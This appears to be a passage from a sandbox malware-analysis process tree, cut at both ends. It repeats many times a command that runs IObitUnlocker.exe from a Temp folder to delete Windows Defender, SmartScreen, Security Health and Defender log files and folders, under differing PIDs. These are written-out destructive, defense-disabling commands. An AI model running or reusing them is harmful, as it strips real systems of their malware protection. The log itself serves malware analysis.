ub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                10⤵
                                                                                                                                                                  PID:4164
                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                  10⤵
                                                                                                                                                                    PID:1408
                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                    10⤵
                                                                                                                                                                      PID:1780
                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                      10⤵
                                                                                                                                                                        PID:5632
                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                        10⤵
                                                                                                                                                                          PID:4736
                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                          10⤵
                                                                                                                                                                            PID:5040
                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                            10⤵
                                                                                                                                                                              PID:5204
                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                              10⤵
                                                                                                                                                                                PID:5660
                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                10⤵
                                                                                                                                                                                  PID:4804
                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                  10⤵
                                                                                                                                                                                    PID:4092
                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                    10⤵
                                                                                                                                                                                      PID:5136
                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows 